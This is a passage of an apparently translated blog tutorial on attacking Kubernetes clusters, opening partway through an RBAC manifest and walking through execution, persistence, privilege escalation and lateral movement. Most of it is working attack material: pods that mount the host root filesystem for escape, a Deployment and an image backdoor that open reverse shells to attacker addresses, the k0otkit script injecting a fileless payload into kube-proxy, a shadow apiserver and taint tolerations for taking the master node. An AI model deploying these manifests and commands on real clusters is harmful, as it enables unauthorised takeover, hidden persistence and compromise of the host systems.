- kind: ServiceAccount
  name: k8s-dashboard-kubernetes-dashboard
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io

After the binding is complete, refresh the dashboard and you can see the resources of the entire cluster.

Once access is obtained, create a privileged container directly to getshell.

0x02 Execution

Directory mount escape

This technique combines execution, persistence, and privilege escalation; to save trouble I cover it all here.

Once we have gained control of the api server, we can create pods and execute commands inside them. If, when creating a Pod, we mount the Node's root directory into some directory of the Pod, then, since we can execute commands inside the Pod, we can modify any file of the Node's root filesystem from within the Pod: writing a malicious crontab, webshell, or ssh public key lets us escape from the Pod to the host Node and gain control of the Node.

The specific reproduction is as follows

First create a malicious Pod

First we create the malicious Pod; it can be created directly as a Pod, or via a Deployment.

Since we mention creating Pods, an aside: what is the difference between creating a Pod directly and creating it through a Deployment?
A Deployment makes it easier to set the number of Pods and to scale Pods horizontally.
A Deployment has more flexible and powerful upgrade and rollback features, and supports rolling updates.
To upgrade Pods with a Deployment you only define the Pods' final state; k8s performs the necessary operations for you.

If you are creating a small one-off thing, creating a Pod directly is enough; there is no need for a deployment.

Create with a Pod:

apiVersion: v1
kind: Pod
metadata:
  name: evilpod
spec:
  containers:
  - image: nginx
    name: container
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /

Create with a Deployment:

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx-deployment
  labels:
    apps: nginx-test
spec:
  replicas: 1
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - image: nginx
        name: container
        volumeMounts:
        - mountPath: /mnt
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /

Write the above text into a yaml file, and then execute:

kubectl apply -f xxxxx.yaml
# if you got in through an unauthorized api server, you may need to point kubectl
# at the api server's ip and port with the -s parameter:
kubectl -s http://master_ip:8080 command

One more aside, on the difference between the kubectl apply and kubectl create commands:
Both can create pods. apply leans toward "maintaining resources" and can update existing Pods, while create leans toward "just create it". In short, when a resource already exists, create reports an error while apply does not.

The malicious container is created

After creation, use the command kubectl get pods to get the name of the malicious pod.

Then use the command kubectl exec -it evilpodname /bin/bash to get a shell inside the pod, and write a malicious crontab / ssh public key / webshell into the Node root filesystem mounted inside the Pod to get a shell on the node.

A diagram of the general process is as follows

Use Service Account to connect to API Server to execute instructions

There are two types of accounts in k8s: user accounts and service accounts. User accounts are for human-cluster interaction (for example, administrators managing the cluster), and service accounts are for pod-cluster interaction (for example, pods calling APIs provided by the api server to perform activities).

If we compromise a Pod that has a high-privilege service account, we can use that service account's identity to call the api server and issue commands to the cluster.

A pod's serviceaccount information is generally stored in the /var/run/secrets/kubernetes.io/serviceaccount/ directory.

However, the default user or service account does not have any meaningful permissions.

By default, a pod that uses its own service account (the default account of its namespace) to query the api server gets the following result; note that it has no permissions:

$ CA_CERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
$ TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
$ curl --cacert $CA_CERT -H "Authorization: Bearer $TOKEN" "https://192.168.111.20:6443/version/"
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {},
  "status": "Failure",
  "message": "version is forbidden: User \"system:serviceaccount:default:default\" cannot list resource \"version\" in API group \"\" at the cluster scope",
  "reason": "Forbidden",
  "details": {
     "kind": "version"
  },
  "code": 403
}

So now I create a high-privilege service account and associate it with a Pod to reproduce this attack method

First create a high-privilege service account

kubectl create serviceaccount niubi   # create service account "niubi"
kubectl create clusterrolebinding cluster-admin-niubi --clusterrole=cluster-admin --serviceaccount=default:niubi   # put niubi in the cluster-admin group, i.e. grant it high privileges

Then associate the service account with the pod

In the spec section of the Pod-creation yaml file, add: serviceAccountName: niubi

Try again, and the api server can now be called.
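A quick verification sketch from inside the pod (paths are the default mounts; the apiserver address follows the earlier example):

# same request as before, now authenticated as the high-privilege account
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
curl --cacert /var/run/secrets/kubernetes.io/serviceaccount/ca.crt -H "Authorization: Bearer $TOKEN" "https://192.168.111.20:6443/api/v1/namespaces/default/pods"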

0x03 Persistence

Persistence here covers how to persist in a Pod, on a Node, and in the cluster.
Some ways to persist on a Node were mentioned in the previous section: writing a crontab, an ssh public key, or a webshell. Personally I see these less as persistence than as privilege escalation, since in actual penetration they are used to escape from the Pod and obtain Node permissions.

Also, for persistence on the Pod, Node, and Master, most methods boil down to "how to persist on a linux machine", and there are far too many of those to cover; here we focus only on the persistence methods unique to the "cloud environment".

Implanting a backdoor in a private image registry (Pod persistence)

If we take over the target's private image registry, we can insert malicious instructions (a reverse shell, etc.) or a constructed backdoor file directly into an image and repackage it as a new image.
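A sketch of the idea with docker commands (the registry, image name, and entrypoint path are all illustrative):

# pull the legitimate image, implant a reverse shell, re-push it
docker pull registry.example.com/app:latest
docker run -d --name tmp registry.example.com/app:latest
# append a reverse shell to the (assumed) entrypoint script
docker exec tmp sh -c 'echo "bash -i >& /dev/tcp/attacker_ip/4444 0>&1 &" >> /entrypoint.sh'
docker commit tmp registry.example.com/app:latest
docker push registry.example.com/app:latest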

Modify core component access permissions (cluster persistence)

Including but not limited to: changing the configuration to expose the apiserver's port 8080, exposing docker.sock, exposing unauthorized etcd, exposing unauthorized kubelet, and other modifications of cluster configuration files that achieve persistence.

shadow api server (cluster persistence/cdk tool utilization)

Deploy an additional api server that performs no authentication and keeps no logs, for our persistent access.

We can do this with cdk, a k8s penetration tool on github (an excellent tool):

https://github.com/cdk-team/CDK/wiki/CDK-Home-CN

Exploit: k8s shadow apiserver · cdk-team/CDK Wiki · GitHub

Deployment

By creating containers through DaemonSets or Deployments, the containers (and their child containers) are restored even if they are cleaned up. Attackers often use this feature for persistence. The concepts involved are:

● ReplicationController (RC)

A ReplicationController ensures that a certain number of Pod replicas are running at any one time.

● ReplicaSet (RS)

ReplicaSet, RS for short. The official recommendation is to use RS and Deployment instead of RC. RS and RC have essentially the same functionality; the only current difference is that RC only supports equality-based selectors.

● Deployment

Its main responsibility is the same as RC: ensuring the number and health of Pods. Most of their functionality is identical, so a Deployment can be regarded as an upgraded RC controller. Official components such as kube-dns and kube-proxy are also managed with Deployments.

Here a Deployment is used to deploy the backdoor:

#dep.yaml
apiVersion: apps/v1
kind: Deployment  # ensures a specific number of Pod replicas are running at all times
metadata:
  name: nginx-deploy
  labels:
    k8s-app: nginx-demo
spec:
  replicas: 3  # number of Pod replicas
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      hostNetwork: true
      hostPID: true
      containers:
      - name: nginx
        image: nginx:1.7.9
        imagePullPolicy: IfNotPresent
        command: ["bash"] # reverse shell
        args: ["-c", "bash -i >& /dev/tcp/192.168.238.130/4242 0>&1"]
        securityContext:
          privileged: true # privileged mode
        volumeMounts:
        - mountPath: /host
          name: host-root
      volumes:
      - name: host-root
        hostPath:
          path: /
          type: Directory

# create
kubectl create -f dep.yaml

Rootkit

The k8s rootkit introduced here is k0otkit, a general post-exploitation technique for Kubernetes clusters. With k0otkit, you can manipulate all nodes in the target cluster (reverse shell) in a fast, stealthy and continuous manner.

Techniques used by k0otkit:

● DaemonSet and Secret resources (fast, continuous reverse shells; payload kept in a separate resource)

● The kube-proxy image (living off the land)

● Dynamic container injection (high stealth)

● Meterpreter (traffic encryption)

● Fileless attack (high stealth)

# generate k0otkit
./pre_exp.sh

# listen
./handle_multi_reverse_shell.sh

Copy the contents of k0otkit.sh to the master and execute:

volume_name=cache
mount_path=/var/kube-proxy-cache
ctr_name=kube-proxy-cache
binary_file=/usr/local/bin/kube-proxy-cache
payload_name=cache
secret_name=proxy-cache
secret_data_name=content

ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ containers:/{print NR}')
volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')
image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')
# create payload secret
cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
apiVersion: v1
kind: Secret
metadata:
  name: $secret_name
  namespace: kube-system
type: Opaque
data:
  $secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA......

# inject malicious container into kube-proxy pod
kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \
  | sed "$volume_line_num a\ \ \ \ \ \ - name: $volume_name\n        hostPath:\n          path: /\n          type: Directory\n" \
  | sed "$ctr_line_num a\ \ \ \ \ \ - name: $ctr_name\n        image: $image\n        imagePullPolicy: IfNotPresent\n        command: [\"sh\"]\n        args: [\"-c\", \"echo \$$payload_name | perl -e 'my \$n=qq(); my \$fd=syscall(319, \$n, 1); open(\$FH, qq(>&=).\$fd); select((select(\$FH), \$|=1)[0]); print \$FH pack q/H*/,; my \$pid = fork(); if (0 != \$pid) { wait }; if (0 == \$pid){system(qq(/proc/\$\$\$\$/fd/\$fd))}'\"]\n        env:\n          - name: $payload_name\n            valueFrom:\n              secretKeyRef:\n                name: $secret_name\n                key: $secret_data_name\n        securityContext:\n          privileged: true\n        volumeMounts:\n        - mountPath: $mount_path\n          name: $volume_name" \
  | kubectl --kubeconfig /root/.kube/config replace -f -

CronJob persistence

A CronJob performs periodic actions, such as backups or report generation. Attackers can use this feature for persistence.

apiVersion: batch/v1
kind: CronJob  # use a CronJob object
metadata:
  name: hello
spec:
  schedule: "*/1 * * * *" # run once per minute
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: hello
            image: busybox
            imagePullPolicy: IfNotPresent
            command:
            - /bin/sh
            - -c
            - # reverse shell or trojan here
          restartPolicy: OnFailure

0x04 Privilege Escalation

This refers to getting a Node shell from a pod, or gaining control of the cluster.

The sections above already mentioned some methods: unauthorized access (api server, kubelet), docker.sock, directory mounts, high-privilege Service accounts, and so on.

In addition, there are some CVEs of Docker and k8s

Container escapes such as CVE-2019-5736, CVE-2019-14271, CVE-2020-15257, CVE-2022-0811

K8s privilege escalations that take over the cluster, such as CVE-2018-1002105, CVE-2020-8558

For docker escapes, see the container escape articles summarized earlier; here we cover privileged container escape.

Privileged container escape

When a container is started with the --privileged option, it can access all devices on the host.

This corresponds to privileged: true being enabled in the K8s configuration file:

spec:
  containers:
  - name: ubuntu
    image: ubuntu:latest
    securityContext:
      privileged: true

Practical case:

Having obtained a WebShell through a vulnerability, confirm the container environment by checking for /.dockerenv in the root directory, list the disks with fdisk -l, then mount the host disk and escape through the mounted directory:

# operations in the webshell
fdisk -l
mkdir /tmp/test
mount /dev/sda3 /tmp/test
chroot /tmp/test bash

0x05 Detection

● Intranet scanning

● K8s common port detection

● Cluster internal network

How to tell whether we are in a container environment (quick checks are sketched after this list):

  • If the /.dockerenv file exists in the root directory, we are in a docker environment
  • If /proc/1/cgroup contains the strings docker or kube, we are in a docker environment or a k8s pod

  • Common commands are missing

  • Check whether the environment variables contain k8s or docker strings

  • Check open ports (netstat -anp): if special ports such as 6443, 8080 (api server), 2379 (etcd), 10250, 10255 (kubelet), 10256 (kube-proxy) are open, we can preliminarily judge that this is a Node or master in a k8s environment. The same method works in reverse: port scanning can reveal whether a target host is a machine in a k8s cluster.
  • Check the current network segment. The Flannel network plug-in uses the 10.244.0.0/16 network by default, and Calico uses 192.168.0.0/16 by default. An address in these segments (especially 10.244.0.0/16) suggests a pod in the cluster. Pods have few commands available; the IP address can be checked with hostname -I (capital i).
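The checks above condensed into a few commands; a sketch:

# quick container / k8s environment checks
ls -la /.dockerenv 2>/dev/null && echo "docker environment"
grep -qiE 'docker|kube' /proc/1/cgroup && echo "container or k8s pod"
env | grep -iE 'kube|docker'
hostname -I   # a 10.244.x.x address suggests a Flannel pod network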

Cluster Intranet Scanning

There are 4 main types of communication in the Kubernetes network:

● Communication between containers in the same Pod

● Pod-to-Pod communication

● Pod-to-Service communication

● Communication between traffic from outside the cluster and Services

It is therefore no different from regular intranet penetration: scan with nmap, masscan, etc.

K8s common port detection

Cluster internal network

● The Flannel network plug-in uses the 10.244.0.0/16 network by default

● Calico uses the 192.168.0.0/16 network by default

0x06 Lateral movement

Purpose

Generally speaking, obtaining the kubeconfig or a ServiceAccount token that can access the apiserver means controlling the entire cluster.

But in red team operations we often need to obtain the server permissions of a specific important system to score. We have already been able to escape by creating a pod on a node and thereby gain that node's host permissions; so can we control which node a pod is created on, and escape from a specified Node or Master node?

Affinity and anti-affinity

Generally, the pods we deploy are assigned to nodes by the cluster's automatic scheduling strategy, but real business needs sometimes require scheduling certain pods onto specific nodes. This relies on a Kubernetes concept: affinity and anti-affinity.

Affinity is divided into node affinity (nodeAffinity) and Pod affinity (podAffinity).

  • Node affinity, loosely described, controls which nodes a Pod may be deployed on and which nodes it may not.
  • Pod affinity and anti-affinity control whether a pod is deployed onto the node where pods carrying certain labels run.

Node affinity ( nodeAffinity )

Node affinity controls which hosts pods are deployed on and which hosts they cannot be deployed on. A demonstration:

View node's label command

kubectl get nodes --show-labels

Label the node

kubectl label nodes k8s-node01 com=justtest
node/k8s-node01 labeled

Once the node carries the relevant labels, they can be used during scheduling: just add a nodeSelector field to the spec field of the Pod:

apiVersion: v1
kind: Pod
metadata:
  name: node-scheduler
spec:
  nodeSelector:
    com: justtest

Pod affinity ( podAffinity )

Pod affinity deals with relationships between pods: for example, if one pod runs on a node, another pod must also run on that node; or conversely, if your pod is on a node, mine should not be on the same node.
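A minimal sketch of the idea (the label and topology key are illustrative):

spec:
  affinity:
    podAffinity:   # schedule onto a node already running pods labeled app: web
      requiredDuringSchedulingIgnoredDuringExecution:
      - labelSelector:
          matchLabels:
            app: web
        topologyKey: kubernetes.io/hostname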

Taints and Tolerations

Node affinity is a property of Pods that attracts them to a class of nodes. Taints are the opposite: they enable a node to repel a class of Pods.

Taint effect options:

  • NoSchedule : pods will not be scheduled onto nodes carrying the taint
  • PreferNoSchedule : the soft-policy version of NoSchedule, meaning the scheduler avoids the tainted node if possible
  • NoExecute : once this taint takes effect, pods already running on the node that have no matching toleration are evicted directly

A cluster built with kubeadm adds a taint to the master node by default, which is why our pods are normally never scheduled onto the master, unless a Pod can tolerate the taint. The Pods that tolerate this taint are usually system-level Pods, such as those in kube-system.

Mark the taint for the specified node:

kubectl taint nodes k8s-node01 test=k8s-node01:NoSchedule

The command above marks the k8s-node01 node as tainted with the NoSchedule effect, which only affects the scheduling of new pods.

Since the node01 node is tainted, if we want a pod scheduled onto it we must add a toleration declaration.

Using taints and tolerances allows Pods to flexibly avoid certain nodes or expel certain Pods from nodes.

For detailed concepts, refer to the official documentation: Taints and Tolerations | Kubernetes

Implement master node escape

For example, to get a shell on the master node, consider these two approaches:

  • Remove the taints (not recommended in production environments)
  • Make the pod tolerate (tolerations) the taint on the node.

Check the node status of k8s-master and confirm the Master node's taints:

Create a Pod with a toleration parameter and mount the host's root directory:

apiVersion: v1
kind: Pod
metadata:
  name: myapp2
spec:
  containers:
  - image: nginx
    name: test-container
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  tolerations:
  - key: node-role.kubernetes.io/master
    operator: Exists
    effect: NoSchedule
  volumes:
  - name: test-volume
    hostPath:
      path: /
kubectl -s 192.168.11.152:8080 create -f test.yaml --validate=false
kubectl -s 192.168.11.152:8080 --namespace=default exec -it test-master bash

Then write an ssh public key, following the method used above to escape to the node01 node, to getshell.

4. Post-infiltration & cluster persistence

Exploration of horizontal nodes and persistent concealment methods after K8S penetration

5. Reference

https://www.const27.com/2022/03/13/k8s security entry learning/  (k8s basics, attack matrix)

https://paper.seebug.org/1803/ (k8s attack matrix)

K8S Cloud Native Environment Penetration Learning - Prophet Community  (K8S Cloud Native Environment Penetration Learning)

Exploration of horizontal nodes and persistent concealment methods after K8S penetration  (exploration of horizontal nodes and persistent concealment methods after K8S penetration)

RBAC utilization of K8S API access control

Kubernetes tutorial | Kuboard (very good Chinese tutorial)

Learn the basics of Kubernetes | Kubernetes (the official k8s tutorial, with an interactive interface; a minor downside is that some parts lack Chinese)


Origin blog.csdn.net/Python_0011/article/details/129716131